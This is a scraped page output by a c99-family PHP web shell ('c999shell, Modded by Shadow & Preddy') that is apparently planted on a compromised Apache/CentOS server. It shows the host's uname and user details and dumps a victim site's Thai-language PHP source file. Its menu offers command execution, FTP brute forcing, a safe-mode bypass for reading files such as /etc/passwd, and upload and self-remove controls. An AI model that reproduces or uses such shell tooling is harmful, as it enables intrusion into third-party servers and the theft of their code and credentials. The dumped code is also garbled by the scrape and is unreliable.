!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk_joice2222/ums/   drwxr-xr-x
Free 52.6 GB of 127.8 GB (41.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     umShowService.php (2.34 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
include_once("pagebody.php");
pageHeader();
$pageTitle="ข้อมูลบริการ";
?>
<table width=100% class="pageTitleBgColor" align="center">
<tr><td align=center><? echo $pageTitle?></td></tr>
</table>
<!--your code here-------------------------------------------------------------------------->
<p><br>
<?
include_once("clsUmService.php");
$oC = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB'], $GLOBALS['USER'], $GLOBALS['PASSWORD']);
$oSv = new umservice($oC);
$oSv->RSumservice();
?>
<table border="0" align="center" cellspacing="1" class="TableBodyBgColor" cellpadding="2">    
  <tr class="TableHeaderBgColor">
    <th>รหัส</th>
    <th>ชื่อบริการ(ท)</th>
    <th>ชื่อบริการ(E)</th>
    <th>URL</th>
    <th>ไอคอน</th>
    <th colspan="2">ดำเนินการ</th>
  </tr>
  <?
 $i
=1;
while (
$oSv->GetRecord()){
    echo 
"<tr  class=\"TableRowBgColor\">\n";
    echo 
"<td align=center>" $oSv->SvID "</td>\n";
    echo 
"<td>" $oSv->SvNameT "</td>\n";
    echo 
"<td>" $oSv->SvNameE "</td>\n";
    echo 
"<td>" $oSv->SvURL "</td>\n";
    echo 
"<td>" $oSv->SvIcon "</td>\n";
    echo 
"<td align=right><a href='#' onClick=\"doEdit($oSv->SvID)\"><img src=\"images/edit.gif\" alt=\"แก้ไข\"  border=\"0\"></a>";
    
//echo $oU->CRUD("<a href='#' onClick=\"doEdit($oSv->SvID)\"><img src=\"images/edit.gif\" alt=\"แก้ไข\"  border=\"0\"></a>","u");
    
echo "</td>\n";
    echo 
"<td>";
    echo 
$oU->CRUD("<a href='#' onClick=\"doDelete(document.form1, '$oSv->SvNameT', $oSv->SvID)\"><img src=\"images/del.gif\" alt=\"ลบ\"  border=\"0\"></a>","d");
    echo 
"</td>\n";
     echo 
"</tr>\n";
}
echo 
"<tr class=TablefooterBgColor>";
echo 
"<td colspan=\"5\">&nbsp;</td>";
echo 
"<td colspan=\"2\" align=\"center\">";
echo 
$oU->CRUD("<a href=\"umAddService.php\"><img src=\"images/new.gif\" alt=\"เพิ่มบริการ\" border=\"0\"></a>","c");
echo 
"</td>";
echo 
"</tr>";
?>
</table>
<br>
</p>
<!--------------------------------------------------------------------->
<? 
$oSv
->Close();
pageFooter(); 
?>
<!--------------------------------------------------------------------->
<!--put javascript here-->
<script language="javascript">
function doEdit(ID){
    window.location='umEditService.php?SvID=' + ID;
}
function doDelete(f,txt,ID){
    if (confirm('ต้องการลบบริการ ' + txt +  ' ใช่หรือไม่') ) {
        window.location='processUmService.php?method=delete&SvID=' + ID;
    }
}
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0109 ]--